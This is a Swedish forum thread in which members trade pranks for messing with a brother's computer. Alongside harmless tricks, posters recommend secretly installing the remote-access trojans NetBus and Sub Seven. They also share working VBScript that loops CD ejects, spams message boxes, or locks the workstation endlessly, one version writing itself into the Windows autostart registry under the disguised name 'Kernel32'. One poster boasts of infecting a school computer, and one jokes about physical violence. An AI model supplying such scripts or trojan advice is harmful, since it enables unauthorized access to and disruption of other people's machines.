Permalänk
Medlem

Jävlas med brossan

Tjena, tänker jävlas med brossan, vet inte om detta är rätt kategori men iaf. Jag vill ha en MASSOR av olika bus Har några exempel som jag gjort:

1. Ta en print på skrivbordet och ha som bakgrundsbild, sen ta bort en ikon han använder ofta (som t.ex Den Här datorn, World of Warcraft etc)

2. Skicka in viruset Netbus till han, så man kan styra hela dator

3. Ändrat texten i genvägen till en annan exe fil så den startar nått annat

4. Blocka hemsidor

Kom gärna med mer förslag I krig är allt tillåtet ^^

EDIT: Fixade stavfel och sånt
EDIT2: Varför jag valde denna delen var för att det kanske finns nått program som man kan jävlas med xD
EDIT3: Ändrade topic

Visa signatur

CHASSI - BeQuiet Dark Base 900 Pro - CPU - Delidded Intel i7 8700K OC 5000Mhz @ 1,375V LLC 6 - MOBO - ASUS Z370 ROG Strix E-Gaming - GPU - EVGA RTX 3070 - RAM - 16GB G.Skill DDR4 3000Mhz - PSU - Seasonic 750W 80+ GOLD - AIO - NZXT Kraken X62 280mm - SSD - 1TB + 500GB Samsung 970 EVO Plus - MONITOR 25" ASUS ROG Swift PG258Q 1080p 1ms 240Hz - CHAIR - Maxnomic Chief Pro TBE - MISC - Corsair K70 LUX - Steelseries QcK Heavy - BENQ Zowie EC2-B - Sennheiser GAME ONE

Permalänk

Re: Jävlas med brossan

Citat:

Ursprungligen inskrivet av Weestman
1. Ta en print på skrivbordet och ha som bakgrundsbil, sen ta bort en ikon han använder ofta (som t.ex Den Här datorn, World of Warcraft etc)

Erhm ... meep ... ehm, w00t?

Permalänk
Medlem

Re: Jävlas med brossan

Citat:

Ursprungligen inskrivet av Weestman
3. Ändrat texten i exe-filen så den startar nått annat

Du menar ändra texten i genvägen till exe filen va?

Permalänk
Medlem

Re: Re: Jävlas med brossan

Citat:

Ursprungligen inskrivet av Don Johan
Erhm ... meep ... ehm, w00t?

Det var faktiskt riktigt roligt back in the days när man var lite yngre

Permalänk
Medlem

Förmodligen inte rätt forumsdel nej...
Lite hjälpsam ska jag nog vara ändå.
hmm..
Tejpa under musen är ju alltid kul.

Mer fantasi än så har jag dock inte.

Permalänk
Medlem

Ändra topic till "Tips för att jävlas med folk" istället

ett simpelt bus är att byta höger/vänsterklick.. simpelt men ack så irriterande.. alternativt koppla ur hans mus och koppla in en egen och gömma dig under bordet och hoppas att han inte ser dig

och sen terrorisera han när inte musen gör som han vill

Ett till musbus är att löda om kontakterna i musen så att uppåt ger neråt och höger ger vänster osv.

EDIT: haha kom på ett till. Prova att plocka ur kulan ur musen (om han har kulmus dvs) och smörja in rullcylindrarna med fett eller tandkräm.. ger fina streck på musmattan

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av geeken
Ändra topic till "Tips för att jävlas med folk" istället

ett simpelt bus är att byta höger/vänsterklick.. simpelt men ack så irriterande..

hur ? kan man göra med Netbus vet jag men nått annat sätt ?

Visa signatur

CHASSI - BeQuiet Dark Base 900 Pro - CPU - Delidded Intel i7 8700K OC 5000Mhz @ 1,375V LLC 6 - MOBO - ASUS Z370 ROG Strix E-Gaming - GPU - EVGA RTX 3070 - RAM - 16GB G.Skill DDR4 3000Mhz - PSU - Seasonic 750W 80+ GOLD - AIO - NZXT Kraken X62 280mm - SSD - 1TB + 500GB Samsung 970 EVO Plus - MONITOR 25" ASUS ROG Swift PG258Q 1080p 1ms 240Hz - CHAIR - Maxnomic Chief Pro TBE - MISC - Corsair K70 LUX - Steelseries QcK Heavy - BENQ Zowie EC2-B - Sennheiser GAME ONE

Permalänk

Är han äldre än dig och kommer han i så fall att ge dig "box" om du jävlas med honom?

Permalänk
Hedersmedlem
Citat:

Ursprungligen inskrivet av geeken
ett simpelt bus är att byta höger/vänsterklick.. simpelt men ack så irriterande.. alternativt koppla ur hans mus och koppla in en egen och gömma dig under bordet och hoppas att han inte ser dig

Hehe, taget från Tips och Trix i Kalle Anka & Co. eller hur?

I övrigt så är inte NetBus ett virus, utan en trojan.

Hmm, bus...

cat /dev/console

är rätt rolig, fungerar dock endast i *NIX men jag vill gärna vara så insnöad att jag antar att alla kör det.

Byta tangentbordslayout till Dvorak eller Svorak kan nog vara rätt intressant också.

Visa signatur

Vim
Kinesis Classic Contoured (svart), Svorak (A5)
Medlem i signaturgruppen Vimzealoter.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Weestman
hur ? kan man göra med Netbus vet jag men nått annat sätt ?

In i kontrollpanelen och titta under mus inställningarna så hittar du det

Permalänk

Jag styr burken med blåtand med min w800i. Lagom kul för polare som lirar bf2 mm och man styr ner planet i havet, hoppar ur det, skjuterfolk i basen mm...

Visa signatur

Workstation:*Acer TimelineX 4830tg *8gb DDR3 1066MHz *Core i5, 2410M, *GeForce GT 540M 2gb, *80gb ssd intel x-25 g2*Griffin Elevator
HTPC:*Lian Li C36B*Gigabyte GA-MA78GM-UD2H*AMD Athlon X2 4850e 2.5GHz + Scyte Shuriken*2x1gb pc8500 corsair dominator*XFX Radeon HD5450 512MB - passivt*40gb ssd intel x-25 g2

Permalänk
Medlem

Skriv i notepad, och spara som text.VBS och sen dubbelklicka på den.

Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection While(true) Randomize Upperlimit = colCDROMs.Count - 1 Lowerlimit = 0 Rom=Int((upperlimit - lowerlimit + 1)*Rnd() + lowerlimit) colCDROMs.Item(Rom).Eject Wend

Borde göras då han går på toa, lr är borta lite snabbt. Då programet gör så att cd läsaren öppnas och stängs. Sen om man klickar på ctrl-alt-del så är de ganska svårt att stänga av om man inte vet vad man letar efter.
(Detta skrevs av någon annan på swec, har kvar de från någon öä tråd. Kommer inte ihåg vem)

Visa signatur

Du skall icke stjäla, staten gillar inte konkurrens.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Kazen
Skriv i notepad, och spara som text.VBS och sen dubbelklicka på den.

Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection While(true) Randomize Upperlimit = colCDROMs.Count - 1 Lowerlimit = 0 Rom=Int((upperlimit - lowerlimit + 1)*Rnd() + lowerlimit) colCDROMs.Item(Rom).Eject Wend

Borde göras då han går på toa, lr är borta lite snabbt. Då programet gör så att cd läsaren öppnas och stängs. Sen om man klickar på ctrl-alt-del så är de ganska svårt att stänga av om man inte vet vad man letar efter.
(Detta skrevs av någon annan på swec, har kvar de från någon öä tråd. Kommer inte ihåg vem)

TACK TACK!! Testade det på min dator ska göra det nån dag på brossans ;D

Visa signatur

CHASSI - BeQuiet Dark Base 900 Pro - CPU - Delidded Intel i7 8700K OC 5000Mhz @ 1,375V LLC 6 - MOBO - ASUS Z370 ROG Strix E-Gaming - GPU - EVGA RTX 3070 - RAM - 16GB G.Skill DDR4 3000Mhz - PSU - Seasonic 750W 80+ GOLD - AIO - NZXT Kraken X62 280mm - SSD - 1TB + 500GB Samsung 970 EVO Plus - MONITOR 25" ASUS ROG Swift PG258Q 1080p 1ms 240Hz - CHAIR - Maxnomic Chief Pro TBE - MISC - Corsair K70 LUX - Steelseries QcK Heavy - BENQ Zowie EC2-B - Sennheiser GAME ONE

Permalänk
Medlem

Hitta detta också.

while(true) Response = MsgBox("Lägg in valfri text här som ska visas i meddelandet", 2, "Lägg topic att visas här") wscript.sleep(5000) Wend

5000 går att ändra, den står i milli sekunder tror jag. Iaf så är 5000=5s. med 5000 så kommer meddelandet upp igen efter 5s då man klickat bort den

Så på text kan du skriva typ "You got virus" topic kan vara typ "Warning"

Visa signatur

Du skall icke stjäla, staten gillar inte konkurrens.

Permalänk
Medlem
Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Medlem

Power: Haha vilka gamla minnen man har från den tråden, dina script fick mig att behöva formatera

Permalänk
Medlem

geeken: Så går det när man är för nyfiken och måste testa allt. Men som en klok människa någon gång sa "Man lär sig av sina misstag"

Edit: En 87 byte mindre variant av cd popern

Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection While(True) Randomize colCDROMs.Item(Int(colCDROMs.count * Rnd())).Eject Wend

Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Medlem
Visa signatur

Stationär: Ubuntu GB DQ6 P35 | Q6600 | 4GB ram Corsair 2*2gb 800mhz (3.5gb) |1tb SATA + 500gb SATA + 250gb SATA | Sparkle 9800gt Passiv
Laptop: Lenovo 3000 v200 | Ubuntu |

Permalänk
Medlem
Citat:

ja, power länka till den tråden 3 posts tillbaka...

Visa signatur

Du skall icke stjäla, staten gillar inte konkurrens.

Permalänk
Medlem

det finns ett program som heter nåt i stil med Mousebumper. nåt.
Som "bindar" om din mus. Så om du klickar på mouse1 så kanske du loggas ut osv. Det gjorde jag med min brorsa.

Permalänk
Medlem

Gör så att du loggas ut, och när du försöker logga in så loggas du åter igen ut (xp).

Set shell = CreateObject("WScript.Shell") While(1) shell.Exec("rundll32.exe user32.dll,LockWorkStation") : Wend

vill du vara riktigt taskig så kan du lägga till

shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernel32",Chr(34) & WScript.ScriptFullName & Chr(34),"REG_SZ"

efter första raden (Set shell = CreateObject("WScript.Shell")) så lägger den till sig själv i registret och autostart

Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk

Kommer inte ihåg genvägen men man kan skriva något dit genvägen ska gå så tängs datorn av eller startar om eller loggar ut, vilket man vill, väldigt simpelt om man bara kommer på vad man ska skriva

Permalänk
Medlem

"c:/WINDOWS/shutdown.exe -l"

Permalänk
Medlem

Sub Seven (googla) fungerar.
Hack program dock.

Visa signatur

En del lever sitt liv, högt upp på en piedestal
En del lever sitt, bara för å rasa av

Permalänk
Medlem

www.sub7.net är en bloatad trojan. Den hittas av alla antivirusprogram idag.. skippa sånt skit eftersom att det finns risk att man sabbar datorn i all hets

Simpla bus är bättre

Permalänk

ska du jävlas med brorsan? ge han en ordentlig pungspark och en rak höger, kissa sedan i hans säng. då har du jävlats med han!

Visa signatur

Dator1: MOBO: asrock x570 taichi razer edition - CPU: Ryzen 5950x - GPU: Asrock 6900 XT Phantom Gaming - RAM: Corsair Vengeance LPX Black 64GB 3600 CL18 - PSU: Corsair RM1000x V3 1000W - Kylning: nzxt kraken x73 360mm AIO - Chassi: lian li pc-o11 XL.

Dator2: Asus bärbar med ryzen 4800h+rtx2060

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Tonasty4u
ska du jävlas med brorsan? ge han en ordenlig pungspark och en rak höger, kissa sedan i hans säng. då har du jävlats med han!

Haha, natthumor på topp!

Permalänk
Medlem

OT: Snyft.. Tonasty4u avstängd

OnT: En sak som är kul är att plocka bort dvi-sladden (om han har tft-skärm) och gömma den. Det kan reta gallfeber på folk, tro mig

Permalänk
Hedersmedlem
Citat:

Ursprungligen inskrivet av Pixies
Sub Seven (googla) fungerar.
Hack program dock.

Hehe, knappast.

Det är en trojan som man kan göra en jävla massa med dock.

Visa signatur

Vim
Kinesis Classic Contoured (svart), Svorak (A5)
Medlem i signaturgruppen Vimzealoter.

Permalänk
Medlem

Kommer ihåg när jag infektade en dator i skolan, gick hem, och skrev ut ett stort S på allt papper i alla skrivarna

Visa signatur

En del lever sitt liv, högt upp på en piedestal
En del lever sitt, bara för å rasa av